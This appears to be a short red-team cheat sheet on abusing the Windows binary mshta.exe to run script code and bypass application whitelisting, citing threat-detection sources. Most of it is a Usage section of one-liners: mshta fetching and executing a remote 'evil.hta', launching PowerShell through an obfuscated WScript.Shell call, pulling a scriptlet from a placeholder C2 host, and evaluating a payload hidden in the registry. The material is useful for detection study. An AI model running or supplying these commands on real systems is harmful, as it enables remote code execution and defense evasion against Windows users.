# MsHTA 
Credit: https://redcanary.com/threat-detection-report/techniques/mshta/
https://www.ired.team/offensive-security/code-execution/t1170-mshta-code-execution


## What is MsHTA
- Signed and native Microsoft binary that already exists on Windows that can execute `VBScript` and `JScript`  embedded within HTML

- Mshta.exe can also be used to bypass application whitelisting defenses and browser security settings.


## Ways that attackers can utilize Mshta
- inline via an argument passed in the command line to Mshta
- file-based execution via an HTML Application (`HTA`) file
- by calling the RunHTMLApplication export function of `mshtml.dll` with `rundll32.exe` as an alternative to `mshta.exe`




## Usage 
- Example 1: Remote file execution with RCE
```powershell
mshta.exe https[.]://IP-address/evil.hta
```

- Use VBScript to run code
```powershell
mshta vbscript:(CreateObject(“WS”+”C”+”rI”+”Pt.ShEll”)).Run(“powershell”,1,True)
```

- Calling a public method named `Exec` with JavaScript
```powershell
mshta javascript:a=GetObject(“script:http[:]//c2[.]com/cmd.sct”).Exec()
```

- Try to read and execute the code that stored in the registry
```VB
mshta.exe javascript:ftD7N="w";tG72=newActiveObject("WScript.shell");td1x70="WirRsy";Cc1zd=tG72.RegRead("HKCU:\\software\\xklrmnw\irote");MIM30iEc="3";eval(Cc1zd);N2nZAF3="mG76"

```














